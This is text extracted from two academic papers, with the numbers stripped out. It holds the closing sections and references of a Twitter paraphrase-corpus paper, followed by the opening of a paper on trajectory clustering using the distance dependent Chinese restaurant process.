o’connor et al. ( ): https://github.com/brendano/tweetmotif reggie miller amber robert woods candice the clippers ryu jeff green harvick milwaukee klay huck morning momma dee dortmund ronaldo netflix gwb dwight howard facebook u.s. . . . . . filtered random percentage of positive judgements tr e n d in g t o p ic s figure : the proportion of paraphrases (percentage of positive votes from annotators) vary greatly across different topics. automatic filtering in section . roughly doubles the paraphrase yield. sio, ) with other annotators. we also compute inter-annotator agreement with an expert annotator on sentence pairs. in the expert annotation, we adopt a -point likert scale to measure the degree of semantic similarity between sentences, which is defined by agirre et al. ( ) as follows: : completely equivalent, as they mean the same thing; : mostly equivalent, but some unimportant details differ; : roughly equivalent, but some important informa- tion differs/missing. : not equivalent, but share some details; : not equivalent, but are on the same topic; : on different topics. although the two scales of expert and crowd- sourcing annotation are defined differently, their pearson correlation coefficient reaches . (two- tailed significance . ). figure shows a heat- map representing the detailed overlap between the two annotations. it suggests that the graded simi- larity annotation task could be reduced to a binary choice in a crowdsourcing setup. . automatic summarization inspired sentence filtering we filter the sentences within each topic to se- lect more probable paraphrases for annotation. our method is inspired by a typical problem in extractive summarization, that the salient sentences are likely redundant (paraphrases) and need to be removed in the output summaries. we employ the scoring method used in sumbasic (nenkova and vander- wende, ; vanderwende et al., ), a simple but powerful summarization system, to find salient sentences. for each topic, we compute the probabil- ity of each word p(wi) by simply dividing its fre- quency by the total number of all words in all sen- tences. each sentence s is scored as the average of the probabilities of the words in it, i.e. salience(s) = ∑ wi∈s p(wi) |{wi|wi ∈ s}| ( ) we then rank the sentences and pick the original sentence randomly from top % salient sentences and candidate sentences from top % to present to the annotators. in a trial experiment of topics, the filtering technique double the yield of paraphrases from to out of sentence pairs over naı̈ve ran- dom sampling (figure and figure ). we also use pinc (chen and dolan, ) to measure the qual- ity of paraphrases collected (figure ). pinc was designed to measure n-gram dissimilarity between two sentences, and in essence it is the inverse of bleu. in general, the cases with high pinc scores include more complex and interesting rephrasings. random filtered mab number of annotators judging as paraphrases (out of ) n um be r o f s en te nc e pa irs (o ut o f ) figure : numbers of paraphrases collected by dif- ferent methods. the annotation efficiency ( , , are regarded as paraphrases) is significantly im- proved by the sentence filtering and multi-armed bandits (mab) based topic selection. . . . . . . random filtered mab number of annotators judging as paraphrases (out of ) p in c (l ex ic al d is si m ila rit y) figure : pinc scores of paraphrases collected. the higher the pinc, the more significant the re- wording. our proposed annotation strategy quadru- ples paraphrase yield, while not greatly reducing diversity as measured by pinc. . topic selection using multi-armed bandits (mab) algorithm another approach to increasing paraphrase yield is to choose more appropriate topics. this is partic- ularly important because the number of paraphrases varies greatly from topic to topic and thus the chance to encounter paraphrases during annotation (fig- ure ). we treat this topic selection problem as a variation of the multi-armed bandit (mab) prob- lem (robbins, ) and adapt a greedy algorithm, the bounded �-first algorithm, of tran-thanh et al. ( ) to accelerate our corpus construction. our strategy consists of two phases. in the first exploration phase, we dedicate a fraction of the to- tal budget, �, to explore randomly chosen arms of each slot machine (trending topic on twitter), each m times. in the second exploitation phase, we sort all topics according to their estimated proportion of paraphrases, and sequentially annotate d( −�)b l−m e arms that have the highest estimated reward until reaching the maximum l = annotations for any topic to insure data diversity. we tune the parameters m to be and � to be be- tween . ∼ . through simulation experiments, by artificially duplicating a small amount of real an- notation data. we then apply this mab algorithm in the real-world. we explore random topics and then exploited of them. the yield of para- phrases rises to out of sentence pairs by using mab and sentence filtering, a -fold increase compared to only using random selection (figure ). related work automatic paraphrase identification has been widely studied (androutsopoulos and malakasiotis, ; madnani and dorr, ). the acl wiki gives an excellent summary of various techniques. many recent high-performance approaches use sys- tem combination (das and smith, ; madnani et al., ; ji and eisenstein, ). for exam- ple, madnani et al. ( ) combines multiple sophis- ticated machine translation metrics using a meta- classifier. an earlier attempt on twitter data is that of xu et al. ( b). they limited the search space to only the tweets that explicitly mention a same date and a same named entity, however there remain a considerable amount of mislabels in their data. zanzotto et al. ( ) also experimented with svm tree kernel methods on twitter data. departing from the previous work, we propose a latent variable model to jointly infer the corre- spondence between words and sentences. it is re- lated to discriminative monolingual word alignment (maccartney et al., ; thadani and mckeown, http://aclweb.org/aclwiki/index.php? title=paraphrase_identification_(state_of_ the_art) the data is released by xu et al. ( b) at: https:// github.com/cocoxu/twitterparaphrase/ ; yao et al., a,b), but different in that the paraphrase task requires additional sentence align- ment modeling with no word alignment data. our approach is also inspired by fung and cheung’s ( a; b) work on bootstrapping bilingual par- allel sentence and word translations from compara- ble corpora. multiple instance learning (dietterich et al., ) has been used by different research groups in the field of information extraction (riedel et al., ; hoffmann et al., ; surdeanu et al., ; ritter et al., ; xu et al., a). the idea is to leverage structured data as weak supervision for tasks such as relation extraction. this is done, for example, by making the assumption that at least one sentence in the corpus which mentions a pair of en- tities (e ,e ) participating in a relation (r) expresses the proposition: r(e ,e ). crowdsourcing paraphrase acquisition: buzek et al. ( ) and denkowski et al. ( ) focused specifically on collecting paraphrases of text to be translated to improve machine translation quality. chen and dolan ( ) gathered a large-scale para- phrase corpus by asking mechanical turk workers to caption the action in short video segments. sim- ilarly, burrows et al. ( ) asked crowdsourcing workers to rewrite selected excerpts from books. ling et al. ( ) crowdsourced bilingual parallel text using twitter as the source of data. in contrast, we design a simple crowdsourcing task requiring only binary judgements on sentences collected from twitter. there are several advantages as compared to existing work: a) the corpus also covers a very diverse range of topics and linguistic expressions, especially colloquial language, which is different from and thus complements previous paraphrase corpora; b) the paraphrase corpus col- lected contains a representative proportion of both negative and positive instances, while lack of good negative examples was an issue in the previous re- search (das and smith, ); c) this method is scal- able and sustainable due to the simplicity of the task and real-time, virtually unlimited text supply from twitter. conclusions this paper introduced multip, a joint word- sentence model to learn paraphrases from tempo- rally and topically grouped messages in twitter. while simple and principled, our model achieves performance competitive with a state-of-the-art en- semble system combining latent semantic represen- tations and surface similarity. by combining our method with previous work as a product-of-experts we outperform the state-of-the-art. our latent- variable approach is capable of learning word-level paraphrase anchors given only sentence annotations. because our graphical model is modular and ex- tensible (for example it should be possible to re- place the deterministic-or with other aggregators), we are optimistic this work might provide a path towards weakly supervised word alignment models using only sentence-level annotations. in addition, we presented a novel and efficient annotation methodology which was used to crowd- source a unique corpus of paraphrases harvested from twitter. we make this resource available to the research community. acknowledgments the author would like to thank editor sharon gold- water and three anonymous reviewers for their thoughtful comments, which substantially improved this paper. we also thank ralph grishman, sameer singh, yoav artzi, mark yatskar, chris quirk, ani nenkova and mitch marcus for their feedback. this material is based in part on research spon- sored by the nsf under grant iis- , darpa under agreement number fa - - - (the deft program) and through a google faculty re- search award to chris callison-burch. the u.s. government is authorized to reproduce and dis- tribute reprints for governmental purposes. the views and conclusions contained in this publication are those of the authors and should not be interpreted as representing official policies or endorsements of darpa or the u.s. government. yangfeng ji is supported by a google faculty research award awarded to jacob eisenstein. references agirre, e., diab, m., cer, d., and gonzalez-agirre, a. ( ). semeval- task : a pilot on se- mantic textual similarity. in proceedings of the first joint conference on lexical and computa- tional semantics (*sem). androutsopoulos, i. and malakasiotis, p. ( ). a survey of paraphrasing and textual entailment methods. journal of artificial intelligence re- search, . artstein, r. and poesio, m. ( ). inter-coder agreement for computational linguistics. compu- tational linguistics, ( ). bhagat, r. and hovy, e. ( ). what is a para- phrase? computational linguistics, ( ). burrows, s., potthast, m., and stein, b. ( ). paraphrase acquisition via crowdsourcing and machine learning. transactions on intelligent systems and technology (acm tist). buzek, o., resnik, p., and bederson, b. b. ( ). error driven paraphrase annotation using me- chanical turk. in proceedings of the workshop on creating speech and language data with ama- zon’s mechanical turk. chen, d. l. and dolan, w. b. ( ). collecting highly parallel data for paraphrase evaluation. in proceedings of the th annual meeting of the as- sociation for computational linguistics (acl). collins, m. ( ). discriminative training methods for hidden markov models: theory and experi- ments with perceptron algorithms. in proceed- ings of the conference on empirical methods on natural language processing (emnlp). das, d. and smith, n. a. ( ). paraphrase identi- fication as probabilistic quasi-synchronous recog- nition. in proceedings of the joint conference of the th annual meeting of the association for computational linguistics and the th inter- national joint conference on natural language processing of the asian federation of natural language processing (acl-ijcnlp). denkowski, m., al-haj, h., and lavie, a. ( ). turker-assisted paraphrasing for english-arabic machine translation. in proceedings of the work- shop on creating speech and language data with amazon’s mechanical turk. derczynski, l., ritter, a., clark, s., and bontcheva, k. ( ). twitter part-of-speech tagging for all: overcoming sparse and noisy data. in proceed- ings of the recent advances in natural language processing (ranlp). diao, q., jiang, j., zhu, f., and lim, e.-p. ( ). finding bursty topics from microblogs. in pro- ceedings of the th annual meeting of the asso- ciation for computational linguistics (acl). dietterich, t. g., lathrop, r. h., and lozano-pérez, t. ( ). solving the multiple instance prob- lem with axis-parallel rectangles. artificial intel- ligence, ( ). dolan, b., quirk, c., and brockett, c. ( ). un- supervised construction of large paraphrase cor- pora: exploiting massively parallel news sources. in proceedings of the th international confer- ence on computational linguistics (coling). dolan, w. and brockett, c. ( ). automatically constructing a corpus of sentential paraphrases. in proceedings of the rd international workshop on paraphrasing. dunning, t. ( ). accurate methods for the statis- tics of surprise and coincidence. computational linguistics, ( ). fellbaum, c. ( ). wordnet. in theory and ap- plications of ontology: computer applications. springer. francis, w. n. and kucera, h. ( ). brown corpus manual. brown university. fung, p. and cheung, p. ( a). mining very-non- parallel corpora: parallel sentence and lexicon ex- traction via bootstrapping and em. in proceed- ings of the conference on empirical methods in natural language processing (emnlp). fung, p. and cheung, p. ( b). multi-level boot- strapping for extracting parallel sentences from a quasi-comparable corpus. in proceedings of the international conference on computational lin- guistics (coling). guo, w. and diab, m. ( ). modeling sentences in the latent space. in proceedings of the th annual meeting of the association for computa- tional linguistics (acl). guo, w., li, h., ji, h., and diab, m. ( ). link- ing tweets to news: a framework to enrich short text data in social media. in proceedings of the th annual meeting of the association for com- putational linguistics (acl). han, b., cook, p., and baldwin, t. ( ). auto- matically constructing a normalisation dictionary for microblogs. in proceedings of the confer- ence on empirical methods on natural language processing and computational natural language learning (emnlp-conll). hinton, g. e. ( ). training products of experts by minimizing contrastive divergence. neural computation, ( ). hoffmann, r., zhang, c., ling, x., zettlemoyer, l. s., and weld, d. s. ( ). knowledge-based weak supervision for information extraction of overlapping relations. in proceedings of the th annual meeting of the association for computa- tional linguistics (acl). hovy, e., marcus, m., palmer, m., ramshaw, l., and weischedel, r. ( ). ontonotes: the % solution. in proceedings of the human language technology conference - north american chap- ter of the association for computational linguis- tics annual meeting (hlt-naacl). ji, y. and eisenstein, j. ( ). discriminative improvements to distributional sentence similar- ity. in proceedings of the conference on em- pirical methods in natural language processing (emnlp). liang, p., bouchard-côté, a., klein, d., and taskar, b. ( ). an end-to-end discriminative approach to machine translation. in proceedings of the st international conference on computational lin- guistics and the th annual meeting of the asso- ciation for computational linguistics (coling- acl). ling, w., marujo, l., dyer, c., alan, b., and isabel, t. ( ). crowdsourcing high-quality parallel data extraction from twitter. in proceedings of the ninth workshop on statistical machine trans- lation (wmt). maccartney, b., galley, m., and manning, c. ( ). a phrase-based alignment model for natural language inference. in proceedings of the conference on empirical methods in natural language processing (emnlp). madnani, n. and dorr, b. j. ( ). generating phrasal and sentential paraphrases: a survey of data-driven methods. computational linguistics, ( ). madnani, n., tetreault, j., and chodorow, m. ( ). re-examining machine translation met- rics for paraphrase identification. in proceedings of the conference of the north american chapter of the association for computational linguistics - human language technologies (naacl-hlt). minnen, g., carroll, j., and pearce, d. ( ). ap- plied morphological processing of english. natu- ral language engineering, ( ). moore, r. c. ( ). on log-likelihood-ratios and the significance of rare events. in proceedings of the conference on empirical methods in natural language processing (emnlp). nenkova, a. and vanderwende, l. ( ). the im- pact of frequency on summarization. technical report, microsoft research. msr-tr- - . o’connor, b., krieger, m., and ahn, d. ( ). tweetmotif: exploratory search and topic sum- marization for twitter. in proceedings of the th international aaai conference on weblogs and social media (icwsm). petrović, s., osborne, m., and lavrenko, v. ( ). using paraphrases for improving first story detec- tion in news and twitter. in proceedings of the conference of the north american chapter of the association for computational linguistics - hu- man language technologies (naacl-hlt). riedel, s., yao, l., and mccallum, a. ( ). mod- eling relations and their mentions without labeled text. in proceedigns of the european conference on machine learning and principles and practice of knowledge discovery in databases (ecml- pkdd). ritter, a., mausam, etzioni, o., and clark, s. ( ). open domain event extraction from twit- ter. in proceedings of the th international con- ference on knowledge discovery and data min- ing (sigkdd). ritter, a., zettlemoyer, l., mausam, and etzioni, o. ( ). modeling missing data in distant super- vision for information extraction. transactions of the association for computational linguistics (tacl). robbins, h. ( ). some aspects of the sequen- tial design of experiments. in herbert robbins selected papers. springer. sekine, s. ( ). automatic paraphrase discovery based on context and keywords between ne pairs. in proceedings of the rd international workshop on paraphrasing. shinyama, y., sekine, s., and sudo, k. ( ). au- tomatic paraphrase acquisition from news articles. in proceedings of the nd international confer- ence on human language technology research (hlt). surdeanu, m., tibshirani, j., nallapati, r., and man- ning, c. d. ( ). multi-instance multi-label learning for relation extraction. in proceedings of the th annual meeting of the association for computational linguistics (acl). thadani, k. and mckeown, k. ( ). optimal and syntactically-informed decoding for monolingual phrase-based alignment. in proceedings of the th annual meeting of the association for com- putational linguistics - human language tech- nologies (acl-hlt). tran-thanh, l., stein, s., rogers, a., and jennings, n. r. ( ). efficient crowdsourcing of un- known experts using multi-armed bandits. in pro- ceedings of the european conference on artificial intelligence (ecai). vanderwende, l., suzuki, h., brockett, c., and nenkova, a. ( ). beyond sumbasic: task- focused summarization with sentence simplifica- tion and lexical expansion. information process- ing & management, . wan, s., dras, m., dale, r., and paris, c. ( ). using dependency-based features to take the “para-farce” out of paraphrase. in proceedings of the australasian language technology work- shop. wang, l., dyer, c., black, a. w., and trancoso, i. ( ). paraphrasing microblog normaliza- tion. in proceedings of the conference on em- pirical methods on natural language processing (emnlp). winkler, w. e. ( ). the state of record link- age and current research problems. technical re- port, statistical research division, u.s. census bureau. xu, w., hoffmann, r., zhao, l., and grishman, r. ( a). filling knowledge base gaps for distant supervision of relation extraction. in proceedings of the st annual meeting of the association for computational linguistics (acl). xu, w., ritter, a., and grishman, r. ( b). gath- ering and generating paraphrases from twitter with application to normalization. in proceed- ings of the sixth workshop on building and using comparable corpora (bucc). yao, x., van durme, b., callison-burch, c., and clark, p. ( a). a lightweight and high perfor- mance monolingual word aligner. in proceedings of the th annual meeting of the association for computational linguistics (acl). yao, x., van durme, b., and clark, p. ( b). semi-markov phrase-based monolingual align- ment. in proceedings of the conference on em- pirical methods on natural language processing (emnlp). zanzotto, f. m., pennacchiotti, m., and tsiout- siouliklis, k. ( ). linguistic redundancy in twitter. in proceedings of the conference on em- pirical methods in natural language processing (emnlp). zettlemoyer, l. s. and collins, m. ( ). on- line learning of relaxed ccg grammars for pars- ing to logical form. in proceedings of the joint conference on empirical methods in natu- ral language processing and computational nat- ural language learning (emnlp-conll). zhang, c. and weld, d. s. ( ). harvesting paral- lel news streams to generate paraphrases of event relations. in proceedings of the conference on empirical methods in natural language process- ing (emnlp). submitted may accepted june published august corresponding authors reza arfa, rezaarfa@gmail.com rubiyah yusof, rubiyah.kl@utm.my academic editor pablo arbelaez additional information and declarations can be found on page doi . /peerj-cs. copyright arfa et al. distributed under creative commons cc-by . open access novel trajectory clustering method based on distance dependent chinese restaurant process reza arfa , , rubiyah yusof , and parvaneh shabanzadeh , centre for artificial intelligence and robotics, universiti teknologi malaysia, kuala lumpur, malaysia centre for artificial intelligence and robotics, malaysia-japan international institute of technology (mjiit), universiti teknologi malaysia, kuala lumpur, malaysia abstract trajectory clustering and path modelling are two core tasks in intelligent transport systems with a wide range of applications, from modeling drivers’ behavior to traffic monitoring of road intersections. traditional trajectory analysis considers them as separate tasks, where the system first clusters the trajectories into a known number of clusters and then the path taken in each cluster is modelled. however, such a hierarchy does not allow the knowledge of the path model to be used to improve the performance of trajectory clustering. based on the distance dependent chinese restaurant process (ddcrp), a trajectory analysis system that simultaneously performs trajectory clustering and path modelling was proposed. unlike most traditional approaches where the number of clusters should be known, the proposed method decides the number of clusters automatically. the proposed algorithm was tested on two publicly available trajectory datasets, and the experimental results recorded better performance and considerable improvement in both datasets for the task of trajectory clustering compared to traditional approaches. the study proved that the proposed method is an appropriate candidate to be used for trajectory clustering and path modelling. subjects artificial intelligence, computer vision, visual analytics keywords path modelling, trajectory clustering, anomaly detection, chinese restaurant process, distance dependent crp introduction the trajectory of a moving object obtained by tracking the object’s position from one frame to the next is a simple yet efficient descriptor of an object’s motion. trajectory analysis has long been a research focus in different fields of study (jonsen, myers & flemming, ; pao et al., ; reed et al., ; fox, sudderth & willsky, ). in the context of intelligent surveillance systems (its) (tian et al., ), trajectory clustering is a critical core technology in many surveillance applications including activity analysis (morris & trivedi, ), path modelling (zhang, lu & li, ), anomaly detection (dee & velastin, ), and road intersection traffic monitoring (aköz & karsligil, ). many trajectory analysis systems consist of two main steps. in the first step, trajectories are grouped into clusters based on their similarities. most proposed methods assume the number of clusters to be known. after the trajectories are clustered, the path taken by agents how to cite this article arfa r, yusof r, shabanzadeh p. . novel trajectory clustering method based on distance dependent chinese restaurant process. peerj comput. sci. :e http://doi.org/ . /peerj-cs. mailto:rezaarfa@gmail.com mailto:rubiyah.kl@utm.my https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. in each cluster will be modelled. there are at least two limitations with these approaches. first, in real-world problems, the number of clusters is usually unknown or is expensive to acquire. furthermore, trajectory clusters and path models are closely related, whereby the knowledge of one helps in improving the performance of the other. most existing trajectory analysis methods can be categorized into similarity-based models and probabilistic topic models (ptm). the main stages of similarity-based approaches are calculating a similarity matrix and clustering the trajectories based on the similarity matrix. at the first stage, pairwise similarities between trajectories are obtained via a similarity function and stored into a n ×n matrix, where n is the total number of available trajectories. defining a suitable similarity measure is a challenging task that directly affects the overall accuracy of the system (zhang, kaiqi & tieniu, ). well-known similarity measures used for trajectory analysis include euclidean distance, dynamic time wrapping (dtw) (keogh & pazzani, ), hausdorff distance (atev, miller & papanikolopoulos, ), and longest common sub-sequences (lcss) (vlachos, kollios & gunopulos, ). after the similarity matrix is obtained, the second stage uses any standard clustering algorithm to cluster the trajectories into k clusters based on their similarities. typical clustering algorithms include spectral clustering (ng, jordan & weiss, ), agglomerative clustering (xi, weiming & wei, ), and fuzzy c-means (weiming et al., ). the main disadvantage of similarity-based approaches is that it requires the number of clusters, k , to be known in advance. when trajectories are clustered, some studies perform path modelling in a further stage. path models are useful in intelligent surveillance systems and used for compact representation of clusters, performing real-time anomaly detection (morris & trivedi, ), and high-level scene understanding (lei et al., ), and route planning (joseph et al., ). makris & ellis ( ) modelled the path as an envelope, which denotes the extent of a path by finding the two farthest samples in a cluster. morris & trivedi ( ) used the weighted average of trajectories of each cluster to form the path model for that cluster. based on the dominant set clustering approach, yiwen et al. ( ) proposed a system that obtains the scene structure from clustered trajectories. all these approaches, however, model the path after the trajectories are clustered. therefore, the performance of the modelled path is limited to how well trajectories are clustered. also, the modelled path is not used to improve the trajectory clustering. another well-known class of approaches in trajectory analysis is based on probabilistic topic model (ptm) (papadopoulos, ). in ptm approaches, trajectories are first converted into a set of symbols via a pre-defined codebook. this new representation of trajectories is then treated as documents while the symbols are treated as words. compared to a similarity-based approach, trajectory analysis methods based on ptm do not usually require the number of clusters in advance. jeong, chang & choi ( ) used latent dirichlet allocation (lda) and the hidden markov model (hmm) to discover the semantic regions and the temporal relationship between them. a two-level lda topic model is proposed by song et al. (lei et al., ). the first level lda models the motion of single-agent as distributions over patch-based arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. features. the second level lda uses the output of the first-level to learn interactions over multi-agents. this model, however, does not perform trajectory clustering. wang et al. ( ) proposed a dual hierarchical dirichlet process (dual-hdp). unlike previous ptm models, dual-hdp is capable of clustering the trajectories and modelling the semantic scene at the same time. each semantic region is modelled as a distribution over grids, and the scene is modelled as a distribution over the semantic regions. the number of clusters and the semantic scene is decided automatically. since the model relies only on bag-of-grids representation, it cannot capture the long-term dependency between observations. this results in having a partial path model for each cluster. having a full path model is an important step for interpreting agents’ movement in scenarios such as highways and junctions. furthermore, since only quantised trajectories are used, the overall performance of dual-hdp is highly sensitive to grid size. choosing a large grid size rapidly decreases the performance due to quantisation error. on the other hand, choosing a small grid size requires considerably more amount of data to learn the trajectory patterns. this study proposed a trajectory clustering and path modelling system that clusters the trajectories and models the path taken by each cluster at the same time. our approach is based on distant dependent chinese restaurant process (ddcrp) (blei & frazier, ), which is a generalisation of the normal chinese restaurant process (crp) (pitman, ). methods distance dependence chinese restaurant process the chinese restaurant process (crp) is a distribution on partitions of integers proposed by pitman ( ). crp can be explained by the following analogy: imagine a chinese restaurant with an infinite number of tables. the first customer enters the restaurant and sits at the first table with probability . next, customers enter the restaurant and sit at occupied tables with probability proportional to the number of customers sitting on that table or sit at an empty table with the probability relative to a parameter α. after this process, which is known as a customer-table assignment, customers sitting on the same table will share a similar dish. this process can be described as follows: p(zi=k|z−i,α)∝ { nk,k≤k α,k=k + ( ) where zi denotes table assignment for the ith customer, k is the total number of occupied tables, and z−i is table assignmthe ent of all other customers except ith customer, and nk is the total number of customers sitting on the ith table. more details of crp and its connection to dirichlet process can be found in gershman & blei ( ). the distance dependence chinese restaurant process (ddcrp) generalises the crp and allows for a non-exchangeable distribution over partitions (blei & frazier, ). unlike crp, where each customer is assigned to a table, in ddcrp each customer is assigned to another customer with a probability relative to their distance/similarity. therefore, the more similar two customers, the more probable they will get a direct link. it is important to arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. note that it is still possible for two customers with small similarities to be indirectly linked to each other via intermediate customers. after this procedure, which is also known as a customer to customer assignment, customers who are directly or indirectly linked will sit down at a table and share a similar dish. more formally, let dij represent the distance between ith and jth customers. probability of customer i have a direct link with customer j is calculated as: p ( ci= j|d,f ,τ ) ∝ { τ, if i= j f (dij), otherwise ( ) where f (d) denotes a monolithically decreasing decaying function that satisfies f (∞)= , d is the matrix of pairwise distance between customers, and τ is a constant that indicates the probability of self-link. the ddcrp was proposed originally for modelling non-exchangeable text documents where the distance between the dates of documents determines their similarity. the documents are converted into their bag-of-words (bow) representation before the posterior probability of ddcrp is calculated. such a conversion to bow representation is a crucial step that makes the inference of ddcrp computationally tractable. recently researchers have adopted ddcrp for problems beyond language processing. ghosh et al. ( ) proposed a hierarchical extension of ddcrp for producing coarser image segmentations in the form of human-like segmentations. in a more recent study, baldassano, beck & li ( ) used ddcrp to model a complex web of connections with a small number of interacting units. the proposed method is used to model the connectivity between sub-regions of the human brain and analysing human migration behaviour. also, ren et al. ( ) used ddcrp for key frame selection from unordered image sets, where the selected frames are used for dense d reconstruction. trajectory analysis with distance dependent crp unlike text data where observations in documents are words sampled from a corpus with a limited number of words, observations in trajectories are not discrete. trajectories are vectors with varying length where each observation gets a real value bounded by the scene’s size. one can divide the scene into blocks of equal sizes and convert a trajectory into its discrete form. after such a conversion, the resulting quantized trajectories are equal length vectors and each observation gets a discrete value. the size of grids in this case, however, will have a direct impact on the system performance. while theoretically smaller grids can improve the performance, they require substantially more data for training. another disadvantage of treating trajectories as documents is the bag-of-words representation. such representation discards the order between observations. discarding the orders between samples in trajectory data is problematic since it is possible for agents from opposite directions to share the same observations over grids. one solution to avoid this problem is to quantise the direction of observations (wang et al., ). estimating the direction of observation requires further processing and sometimes includes an inaccurate estimation. such a quantisation increases the size of the corpus and, therefore, requires more data for training. in addition, with bag-of-word representation alone long-term arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. dependencies between observation cannot be captured which results in having partial path models in existing ptm approaches. we addressed these problems by using similarity between trajectories as the prior probability in ddcrp. using such a prior probability limits the assignment of trajectories and promotes trajectories to get linked based on how similar two trajectories are. in addition to the similarity measure, whether the trajectories are linked together or not, also will depend on their discrete observation over the grids. since most similarity measures can be applied prior to converting the trajectory into discrete form, such a formulation is less sensitive to the choice of grid size. in addition, since some similarity measures, including modified hausdorff and lcss, also take the order of the observations into account, it is not required to quantise the direction anymore. any raw trajectory ti, is usually represented by a sequence of its ni observation ti =[oi, ,...,oi,l,...,oi,ni]. in this representation, oi,l indicates lth observed position of ith object. let dij to indicate pairwise distance between ith and jth trajectories. this distance can be of any general distance used to measure similarity between trajectories. the result of pairwise distance between n trajectories can be stored in a distance matrix and denoted as d∈<n×n . apart from the calculation of distance matrix discussed above, raw trajectories are converted into bag-of-grids representation. for this, the scene is divided into m grid cells of equal size. based on the cell in which it falls into each observation of a trajectory oi,l, is individually quantised. then a raw trajectory, ti, is approaximated by bag-of-grid represetnation xi∈<m . each element of xi(s) indicates the number of times ith trajectory had an observation in the sth grid cell. using ddcrp’s metaphor, we use the bag-of-grid representation of trajectories as customers, clusters as the tables and path models as dishes. based on the definition of ddcrp, it is not possible to draw the table directly. instead, the outgoing link for each customer needs to be drawn. trajectories that directly or indirectly link together are considered to be in the same cluster. all trajectories in the similar cluster share the same path model which is a multinomial distribution over the grid cells. each path model is independently drawn from a base distribution g . in our case, g is a dirichlet distribution. the full generative process for the news program is as follows: . for each trajectory, sample customer assignment ci∼ddcrp(d,f ,τ) as explained in eq. ( ). . drive table assignment from customer assignment. for each table, k, sample its parameter from the base distribution ϕk ∼g . for each trajectory, independently draw xi∼mul(.|ϕzi) the decaying function, f (.), in eq. ( ) was defined as: f (d;γ;γ )=exp(− d γ ). ( ) with this function, the probability of linking two trajectories becomes smaller as their distance increases. the parameterγ controls how fast this probability decays with increasing distance. the inference of ddcrp requires drawing samples for all samples which have the possibility of being linked. arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. inference the key problem that needs to be addressed is computing the posterior distribution of latent customer assignment conditioned on the bag-of-grid cell representation of trajectories x :n . in our problem, the based distribution g , is conjugate to the data generating distribution p(xi|zci,g ). therefore, the cluster parameters ϕk can be analytically marginalised. after such a calculation, the posterior distribution is expressed by: p ( c :n|x :n,d,f ,τ,γ,γ ) ∝ n∏ i= p(ci|d,f ,τ,γ,γ )p(x :n|z(c :n )) ( ) where z(c :n ) denotes the table assignment and p(x :n|z(c :n )) is the likelihood function which can be expressed by blei & frazier ( ) p(x :n|z(c :n))= |z(c :n )|∏ k= p(xzk(c :n )|z(c :n)) ( ) with |z(c :n)| being the number of unique tables and zk(c :n) denoting all customers assigned to table k. due to the combinatorial sum in the denominator, the analytical solution of the posterior given by eq. ( ) is intractable. instead of exact inference, collapsed gibbs strategy (blei & frazier, ) is used to derive the posterior inference where the customer assignment is iteratively sampled from the following equation: p(ci|c−i,x :n,d,f ,τ,γ,γ )∝p(ci|d,f ,τ)×p(x :n|z(ci∪c−i)) ( ) where c−i denotes all customer assignments except for ci. the first term on the right side of the equation is ddcrp’s customer assignment discussed in eq. ( ), and the second term is the likelihood term given by eq. ( ). more details can be found in the supplemental material. results and discussion the performance of the proposed approach was evaluated on the cross (morris & trivedi, ) and the lankershim datasets (ngsim: next generation simulation, ). the cross dataset provides objects trajectories and their ground truth activities. the data are organized into train and test sets. there are , and , trajectories in the train and test sets respectively. two hundred samples in the test set are labeled as abnormal activities. these samples were discarded in this study and we evaluated the proposed model on , trajectories in the test set with legal activities (fig. ). the lankershim dataset is part of the next generation simulation (ngsim) program provided by the us federal highway administration (fhwa). the dataset contains videos taken with overhead intersection cameras. the dataset also provided the trajectories of moving vehicles. based on the time the videos are collected, the data are placed into : am to : am and : am to : am subsets. the trajectories took place near an intersection, and trajectories outside of this area were removed (see fig. ). the corresponding x and y coordinate for this region were − < x < and < y < respectively. after arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. figure vehicle trajectories in cross dataset. the colors of trajectories indicate the ground truth ac- tivity label. full-size doi: . /peerjcs. /fig- filtering the trajectories having less than ten observations, a total of trajectories were obtained. since this dataset does not provide activity labels for trajectories, the trajectories were manually labelled into activities ( legal activities, and two activities where agents took illegal maneuvers). the main parameter that needs to be set prior to experiments is the size of the grid cells. theoretically, smaller grid cells produce a better result with the cost of requiring more data. based on the performed experiments, the cell size was set for the cross to × and for the lankershim into × pixels. these choices of cell size divide the cross and lankershim into by and by equal sized grid cells respectively. each raw trajectory was converted into bag-of-grid representation mentioned in the section of trajectory analysis with distance dependent crp. the dimensions of bag-of-grids representations are xi∈< × and xi∈< × for cross and lankershim datasets respectively. the correct clustering rate (ccr) is used to evaluate the clustering performance. the ccr has been used as evaluation criteria to verify trajectory clustering algorithms in several studies (morris & trivedi, ; weiming et al., ; zhang, kaiqi & tieniu, ). given the ground truth set g and resulting clusters set c, corresponding cluster that maximizes arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. a b figure the lankershim dataset: (a) area of interest, (b) vehicle trajectories in the interest area col- lected from : am to : am. full-size doi: . /peerjcs. /fig- the number of matched labels is found. the ccr is defined as ccr= n k∑ i= pi ( ) where n is the number of trajectories, k is the number of clusters in the ground truth. given the assignment between ground truth and estimated cluster labels, pi is computed as (zhang, kaiqi & tieniu, ): pi= {∣∣ci∩gm∣∣; given ci∈c assigned to gm∈g ; otherwise ( ) the proposed method was compared with dual-hdp and three well-known distance measure methods, lcss, dtw, and modified hausdorff (mh). for each distance, four unsupervised clustering algorithms were used: k-mean clustering, spectral clustering, agglomerative clustering, and graph-based clustering. the average ccr of clustering algorithms for each distance method is reported in this study. one limitation of distance- based clustering techniques is that they require the number of clusters to be given to them. to show the effect of choosing the number of clustering on the performance the experiments were run with the different number of clusters, including the true value. the other parameters of competitor methods were set during 